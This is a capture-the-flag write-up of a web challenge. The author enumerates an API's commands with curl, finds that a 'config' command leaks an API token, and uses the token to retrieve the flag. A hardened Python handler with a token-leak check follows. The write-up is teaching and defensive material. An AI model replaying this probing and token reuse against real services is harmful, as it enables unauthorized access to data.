Description:

Visit the site at https://ggcs-wm03.allyourbases.co and investigate the API that serves the page to find a way to get the flag.

Going to the developer console and the network tab, we find that the page is making requests shaped like this:

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getUser": 1}'

Let's try not providing anything in that JSON object:

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{}'
{"statusCode": 200, "body": {"commands": ["getUser", "setUser", "getFlag", "config"]}}

Hello.

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getFlag": {}}'
{"statusCode": 200, "body": {"error": "missing api_token."}}

:(

What about that config endpoint?

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"config": {}}'
{"statusCode": 200, "body": {"api_token": "supersecret31337apitoken"}}

Oops.

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getFlag": {}, "api_token": "supersecret31337apitoken"}'
{"statusCode": 200, "body": {"flag": "LAx_AUThEntiCaTION-:("}}

(technically, this isn't lax authentication, it's sensitive data exposure)
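To make the distinction concrete, here is an added example (my own, not the challenge's code) of how a backend for this API could be written so that the "config" command only returns public settings and "getFlag" actually verifies the token. It assumes a Lambda-style handler behind a non-proxy API Gateway integration, where the event passed in is the parsed JSON body; the token and flag are read from environment variables, with constructed placeholder defaults for local runs.

```python
import hmac
import os

# Constructed defaults for local runs; a deployed handler reads both from the
# environment (or a secrets manager) and never echoes the token back to callers.
API_TOKEN = os.environ.get("WM03_API_TOKEN", "local-test-token")
FLAG = os.environ.get("WM03_FLAG", "flag{local-test}")

COMMANDS = ["getUser", "setUser", "getFlag", "config"]

# Settings that are safe to show to any caller. Nothing secret belongs here.
PUBLIC_CONFIG = {"version": "1", "region": "eu-west-1"}


def _response(status_code, body):
    return {"statusCode": status_code, "body": body}


def _authorized(request):
    """True only if the request carries a string api_token equal to the secret."""
    token = request.get("api_token")
    if not isinstance(token, str):
        return False
    # Constant-time comparison: a plain == would leak timing information.
    return hmac.compare_digest(token.encode("utf-8"), API_TOKEN.encode("utf-8"))


def handler(event, context=None):
    """Lambda-style handler; with a non-proxy integration the event is the JSON body."""
    if not isinstance(event, dict):
        return _response(400, {"error": "request must be a JSON object."})

    requested = [name for name in COMMANDS if name in event]
    if not requested:
        # Listing the command names is harmless; the secrets behind them are not.
        return _response(200, {"commands": COMMANDS})
    command = requested[0]

    if command == "config":
        # Only public settings; api_token is deliberately absent from this response.
        return _response(200, dict(PUBLIC_CONFIG))

    if command == "getFlag":
        if not _authorized(event):
            return _response(401, {"error": "missing or invalid api_token."})
        return _response(200, {"flag": FLAG})

    # getUser / setUser are outside the scope of this example.
    return _response(501, {"error": f"{command} not implemented in this example."})


def leaks_token(response):
    """Regression check: does any part of a response body contain the secret token?"""
    return API_TOKEN in str(response.get("body", ""))


if __name__ == "__main__":
    # Replay the same sequence of requests from the writeup against the hardened handler.
    for request in [{}, {"getFlag": {}}, {"config": {}},
                    {"getFlag": {}, "api_token": API_TOKEN}]:
        print(request, "->", handler(request))
```

The leaks_token check is the kind of assertion worth keeping in a test suite: it fails the moment someone adds a "convenient" field that carries the credential, which is exactly what happened with the challenge's config command.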